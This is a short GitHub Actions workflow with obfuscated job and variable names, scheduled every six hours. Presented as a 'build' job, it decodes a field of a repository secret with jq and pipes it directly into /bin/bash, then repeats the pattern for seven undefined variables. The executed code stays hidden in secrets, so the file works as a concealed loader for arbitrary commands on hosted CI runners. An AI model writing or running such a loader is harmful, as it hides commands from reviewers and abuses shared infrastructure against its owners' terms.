name: shisuanjian3489
on:
  workflow_dispatch:
  schedule:
    - cron: '0 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: shisuanjian3489
        env:
          cgpxl940: ${{ secrets.cgpxl940 }}
        run: |
          echo $cgpxl940 | jq -r .mqxxf3353 | /bin/bash
          echo $w406 | jq -r .az4209 | /bin/bash
          echo $im26 | jq -r .qxd73 | /bin/bash
          echo $qacl453 | jq -r .bq32 | /bin/bash
          echo $tl4 | jq -r .c69331 | /bin/bash
          echo $ce9257 | jq -r .r4894 | /bin/bash
          echo $nmsoo7852 | jq -r .zty8737 | /bin/bash
          echo $uyo615 | jq -r .pkepc83 | /bin/bash

